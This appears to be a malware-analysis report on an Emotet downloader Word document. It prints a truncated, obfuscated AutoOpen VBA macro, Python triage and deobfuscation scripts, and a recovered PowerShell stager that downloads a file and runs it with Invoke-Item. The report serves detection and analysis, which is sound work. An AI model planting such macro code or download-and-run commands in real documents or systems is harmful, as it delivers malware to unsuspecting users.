Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment
The sample was identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6872637-0'. Static analysis recovered a VBA project with an AutoOpen procedure, the entry point Word runs as soon as macros are enabled and a standard Emotet technique, together with a call to Shell(), which executes a command line built by the macro. The extracted macro is padded with junk InStr/InStrRev arithmetic over variables that are never assigned in the visible code, and it assembles a caret-escaped command line for cmd.exe with delayed expansion (/V:ON) that stores a value with set bSn=; once the carets are removed and the text is reversed, the visible fragments read as PowerShell calling .DownloadFile(...) and Invoke-Item. Taken together, the AutoOpen entry point, the Shell() call and the reversed PowerShell fragments indicate downloader functionality consistent with the ClamAV family name.
Heuristics (6)
- ClamAV: Doc.Downloader.Emotet-6872637-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6872637-0
- VBA macros detected [medium, 2 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA [critical] (OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this rule's description conflicts with the VBA findings above and with the extracted macros.bas artifact: a VBA project was recovered from this sample, so the marker adds nothing beyond OLE_VBA_AUTOOPEN here.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI present in any Office file that carries drawing content, not a download location; the macro's actual download URLs, if any, are not in the visible portion of the preview below.
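The three macro findings above (an auto-exec entry point, a Shell() call, VBA present at all) can be reproduced with a few regular expressions over decoded VBA source. The script below is an added example written for this page, not part of the analyzer or of oletools; SAMPLE_VBA is a constructed snippet modelled on the macro preview further down (the real macros.bas is 45 KB and truncated there), and the caret-ratio indicator is my own heuristic for cmd.exe caret escaping rather than one of the analyzer's rules.

```python
import re

# Constructed sample: a minimal macro modelled on the preview on this page
# (AutoOpen entry point, junk InStrRev arithmetic, a caret-escaped cmd.exe
# string, and a Shell() call). It is not the real extracted macros.bas.
SAMPLE_VBA = r'''
Attribute VB_Name = "AoPHVidjYUvvRX"
Sub AutoOpen()
    Dim EnrrJ(2)
    EnrrJ(0) = InStrRev(BOwnzDZX + DriSClwPFqEHsrsf, vaVitI + JQjIIwiB)
    knYBK = "d /V^:^ON/C" + """" + "^s^e^t ^b^Sn=^ ^"
    tMZrnjf (knYBK + LbpzQ)
End Sub
Function tMZrnjf(cmdline)
    tMZrnjf = Shell(cmdline, 0)
End Function
'''

# Procedures Office runs on its own once macros are enabled (no click needed).
AUTOEXEC = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+"
    r"(AutoOpen|AutoExec|AutoClose|Document_Open|Workbook_Open|Auto_Open)\b",
    re.I | re.M,
)
# Process-execution primitives reachable from VBA. A deliberately short list;
# olevba's keyword table is the reference for real triage.
EXEC_CALLS = re.compile(
    r"\b(Shell|WScript\.Shell|CreateObject|ShellExecute|Win32_Process)\b", re.I
)
# VBA string literal; a doubled quote inside it is an escaped quote.
STRING_LIT = re.compile(r'"((?:[^"]|"")*)"')


def triage(vba: str) -> dict:
    """Reproduce the report's macro findings over decoded VBA text and add a
    caret-ratio indicator: cmd.exe caret escaping (s^e^t) inflates the share
    of '^' characters inside string literals far beyond ordinary code."""
    literals = [m.group(1) for m in STRING_LIT.finditer(vba)]
    carets = sum(s.count("^") for s in literals)
    chars = sum(len(s) for s in literals)
    return {
        "OLE_VBA_AUTOOPEN": sorted({m.group(1) for m in AUTOEXEC.finditer(vba)}),
        "OLE_VBA_SHELL": sorted({m.group(1) for m in EXEC_CALLS.finditer(vba)}),
        "caret_ratio": carets / chars if chars else 0.0,
    }


def looks_like_downloader(findings: dict) -> bool:
    """Same reasoning as the report summary: an auto-exec entry point combined
    with a process-execution primitive is the downloader-macro shape."""
    return bool(findings["OLE_VBA_AUTOOPEN"]) and bool(findings["OLE_VBA_SHELL"])


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    for key, value in result.items():
        print(f"{key}: {value}")
    print("downloader shape:", looks_like_downloader(result))
```

The caret ratio is only an indicator: legitimate macros rarely put any `^` in string literals, so a ratio above a few percent is worth a look, but absence of carets says nothing, since Emotet and others switch between caret escaping, Chr() chains and Base64 between builds.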
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45434 bytes | 87e7e16d70175257a1f92c4d0ae8ce9e60d8c581b4374d7f524d19bedeb07db9 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "AoPHVidjYUvvRX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim EnrrJ(2)
EnrrJ(0) = InStrRev(BOwnzDZX + DriSClwPFqEHsrsf + jdrXTnO, vaVitI + BBjvuiBwujGMhsTNqviww + JQjIIwiB) + InStrRev(Emozqaw + qDNhWDZXtTDjvuVOmhbKr + sfOAUlFO, viNEjDHI + UruiFNhzOtWTujXZh + mwZCAK)
EnrrJ(1) = InStrRev(UCUoaBl + HEzPuCZPtpXjipdvEDMX + trBfBJ, cRdzFrvA + RNGkTiavpfrwtALXkj + aHRMfuN) + InStrRev(PwFqO + XUbNTQWwBMqkchjjdBSf + pabwaFi, AQIVNJVu + hXQcMSYifWEoiqKaVvi + cmWMTWIG)
Dim IAihjf(2)
IAihjf(0) = InStrRev(snbqkW + dqAjPtYfBAsnYmooHnCbz + aQRjqSRE, uDjPX + iiuaUkEviQlbPZTMHv + biUfwjI) + InStr(hAwSlOF + fvjBTczzGwLwGUwzQnUmJfD + kSKNqa, waPshF + cZjtcSXGEsLVQAfGhv + XrEwsc)
IAihjf(1) = InStrRev(ikkhGUi + znGlhEXEzrBGtELB + avzVKa, PwSqrhHc + nzancPhjdoBIjQqHPXdiipD + HVwQV) + InStr(azmSko + uFNnlaAIVSRJPvpWcLfX + SpsmaXb, oZcPokG + vDEFLCnuSzhPhhCHVpzrUZ + WKBlWw) + InStr(cjNiqzh + zCYrvVAwsuzfkfRitj + TFEVFFQ, UiUXC + wfkXFBiwhtLhwYSFlqrP + WmcdPIi) + InStrRev(lNvDiSan + LFoIlGEzskEPpqCohYLK + VjUom, Trjbi + XSElHFjwMuEYwAvwwP + QKhhlYG)
Dim AhztH(1)
AhztH(0) = InStrRev(tDwjoYw + bjOflBTiavBBXwSOni + JAoJo, pppzhtP + PjfOjSadhJrFhNcEfwaMN + GMDrWHj) + InStr(GwSbqZvf + nkHbUnVLmoUROwMmLBKWjGd + NFAvEQMA, iEAwwwJ + EfiLGtwdOYUqMYztPBCvOi + KFOZZUw) + InStrRev(iuuBIV + aPrrcwQPWfBjALlqOow + pHPkssHf, oOOqi + PKwRVhSNpWiUzbPzjjSXPz + cSlUDkR) + InStrRev(BdUZwXwC + zLMwRNWRwmiRnuIUTuDYn + hvnIUU, jOPUTfqN + BSLhRFchQGvmYkzjIcSDS + aaopdhDv)
tMZrnjf (KeyString(KZwOdCwv + vbMqiT + 14 + 21 + 32 + uizYTA + LpMWPCnw) + rvwSz + jjLKWkD + KeyString(HTzmFwo + GjpAsnOV + 15 + 23 + 39 + PYbiNlm + lpEJad) + LbpzQ + CkZUpVmK + lntGHG + LQOUaCm + aHthmE)
Dim ijmhbz(1)
ijmhbz(0) = InStrRev(aaYvazzt + icjZtJszUXdvhXiPC + YjAcOk, JANYWwK + cRiwVQwvlsbOdSEzYQvf + KWQWFL) + InStrRev(vmkAVC + zSzEwWuuHuLkWnZKtjHq + NTrhdt, VTcfraQ + czQLdZwNvsXcZhkbfNR + cPDEGwzu) + InStrRev(fsJLk + jPwJLwdFJpoVjXjOW + QvziLKkQ, itdBQ + QaEAnKXDUIlWlszCL + SPpmoFb) + InStrRev(TnSzw + dlrHIqbifLIlCOYjpLAVA + LpwJYZ, VQUZi + KsJtTtGFjToGfcLjimflGl + jzDJzfB)
End Sub
Attribute VB_Name = "MHcfFkjZ"
Function LbpzQ()
Dim FEjSSu(1)
FEjSSu(0) = InStrRev(fuizhiB + UYaNFAFDUoBvEOkvYU + QrCzWR, OwpNMpf + jNOZcazKuTzFFFKVDm + dtZCGhHO) + InStrRev(crHDtoR + LWGdItDKiJzjCjCXdRCj + dNdwMW, oSSWPRJ + BjamvpSMltohJQffaMu + MsjGO) + InStrRev(ObuBwJa + tjzkLvJbAwlKGbVaCG + vAfNm, MqzHjfuY + laiOSzzjuVozfcEjjiU + nHoXvfM) + InStrRev(JRjwpcB + DNZYrSPDqoMiRYLKMEEiS + NlSnbikT, IOQWifcV + azHBNRjKwfGNAEPOGbOAko + odYbMFtP)
Dim OONGLZ(2)
OONGLZ(0) = InStrRev(iPAwNn + GvttfHaQOPQWfZiAamspi + QNzqpS, iRYJTsL + kbuvDFXimmdNFQqVcaZz + zzWQLHPj) + InStrRev(DQUNP + GfwEULaCBpadNGGw + WfXui, SvdGk + SjkcoMIFZIstZCQIMjz + mKwHG) + InStrRev(qfsLiVd + QNZwlplQhVpjSKZqiNi + pSNAOYs, mwVaa + BMqYDuOlsTwmfLtITcHX + ripwNsjA) + InStrRev(ArdduDb + EwrbdOjRFUujLMZnwAj + CHqiPOPA, ntzGL + LRvZittSiiUVBzYVYb + qTdnK)
OONGLZ(1) = InStr(GNDsp + SUwwozjlVhSszLbtOFGEX + GbQkC, BjEYb + XEHIGrMYXsRvCuYNlrEU + BOqTdR) + InStr(ZqAwvQrE + tslkBUoAOBjfqFdH + FJcVMuNU, jzBbjh + kwoRUwXQTFLNzojIOp + UssUf) + InStrRev(vIoQX + nopYouPwIjwtZCXYs + cSRFIX, waGBAv + AhMFwkkiVujltwOLWHiVW + LJqrnF) + InStrRev(XqjPd + ijmcNmDDPljviSmXYasjhp + WHWWkT, BitFmI + cBWKiFicFUHqzEnhUhsAQ + Qdvhl)
knYBK = "d /V^:^ON/C" + """" + "^s^e^t ^b^Sn=^ ^" + " ^ ^ ^ ^ ^ " + " ^ ^ ^ ^ ^ ^ ^ }^}" + "^{^hc^t^ac^}^;^" + "k^a^er^b^;^H^W"
Dim ZKsBJ(1)
ZKsBJ(0) = InStrRev(CAPSi + HHqLzNAWBFlBUlqYj + NZFhb, fWzrP + DDOHDYnqYvqAficGCtQGRv + rfGuHNDQ) + InStrRev(RcSRXdh + lhAttptEnzwMwKpdndz + AoYElVmY, pGrmN + KzdkiFhUNoDzHosERpR + YRBnd)
NtkPXmcT = "^z^$^ ^m^e^t^I^-^e^" + "k^ovn^I^;)^H^W" + "^z^$^ ^,^j" + "^a^w$(^e^l^iF^d^a^o^" + "lnw^o^D^.^p^BC^$^{^" + "yr^t^{)r^A^q^$"
Dim ZYSzlM(2)
ZYSzlM(0) = InStrRev(YWQIwUf + pntImsRcLMDPpMia + jqWVsSBZ, mzmoR + mzajJBfMSATENKIwWnt + rZ
... (truncated)
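Two of the string-building statements in the preview (knYBK and NtkPXmcT) are enough to see what the macro hands to Shell(): every VBA literal is caret-escaped for cmd.exe, and the value stored with set bSn= is the PowerShell stager written backwards. The script below is an added example, not code from the analyzer or from the sample. It evaluates the two VBA expressions copied verbatim from the preview, strips the carets, joins the fragments in their order of appearance (an assumption, since the statement that concatenates the variables is in the truncated part) and reverses the stored value.

```python
import re

# Constructed input: the two string-building statements exactly as they appear
# in the macro preview above. Their final assembly order is an assumption;
# the rest of the macro is truncated on the page.
FRAGMENTS = {
    "knYBK": r'"d /V^:^ON/C" + """" + "^s^e^t ^b^Sn=^ ^" + " ^ ^ ^ ^ ^ " + " ^ ^ ^ ^ ^ ^ ^ }^}" + "^{^hc^t^ac^}^;^" + "k^a^er^b^;^H^W"',
    "NtkPXmcT": r'"^z^$^ ^m^e^t^I^-^e^" + "k^ovn^I^;)^H^W" + "^z^$^ ^,^j" + "^a^w$(^e^l^iF^d^a^o^" + "lnw^o^D^.^p^BC^$^{^" + "yr^t^{)r^A^q^$"',
}

# VBA string literal; "" inside a literal is an escaped quote, so """" is one '"'.
VBA_STRING = re.compile(r'"((?:[^"]|"")*)"')


def vba_concat(expr: str) -> str:
    """Evaluate a VBA expression consisting only of string literals joined with '+'."""
    return "".join(m.group(1).replace('""', '"') for m in VBA_STRING.finditer(expr))


def decaret(text: str) -> str:
    """Undo cmd.exe caret escaping: '^' makes the following character literal,
    so '^^' becomes '^' and '^s^e^t' becomes 'set'."""
    return re.sub(r"\^(.)", r"\1", text, flags=re.S)


def split_launcher(text: str) -> tuple:
    """Separate the cmd.exe launcher prefix (up to and including 'set bSn=')
    from the value it stores. The variable name is the one in the preview."""
    head, sep, payload = text.partition("set bSn=")
    return head + sep, payload


def recover(fragments: dict) -> tuple:
    """Strip carets from each fragment, join them in order of appearance and
    reverse the stored value. Returns (launcher_prefix, recovered_payload).
    The reversal mirrors what the (truncated) delayed-expansion loop would do
    at runtime; that is an inference from the fragments, not visible code."""
    joined = "".join(decaret(vba_concat(expr)) for expr in fragments.values())
    launcher, payload = split_launcher(joined)
    return launcher, payload[::-1].strip()


if __name__ == "__main__":
    launcher, payload = recover(FRAGMENTS)
    print("launcher:", repr(launcher))
    print("payload: ", payload)
```

Run as-is it prints the launcher prefix `d /V:ON/C"set bSn=` (the literal starts mid-word, so the leading characters of the command name are built elsewhere in the truncated code) and the recovered value `$qAr){try{$CBp.DownloadFile($waj, $zWH);Invoke-Item $zWH;break;}catch{}}`, i.e. the body of a loop that downloads to the path in $zWH, opens it with Invoke-Item and stops at the first success. Whatever populates $qAr, $waj and $zWH, and the loop that reverses the stored value at runtime, are not in the visible preview, so the download URLs cannot be read off this page.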